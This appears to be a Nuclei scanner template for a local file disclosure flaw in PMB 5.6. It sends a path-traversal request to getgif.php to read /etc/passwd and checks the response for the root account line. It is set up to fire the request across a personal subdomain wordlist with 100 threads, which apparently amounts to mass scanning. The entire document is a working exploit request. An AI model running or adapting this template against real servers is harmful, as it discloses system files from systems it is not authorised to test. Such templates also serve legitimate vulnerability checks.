id: pmb-directory-traversal 2

info:
  name: PMB 5.6 Directory Traversal
  author: geeknik
  severity: medium
  description: The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure.
  reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
  tags: lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
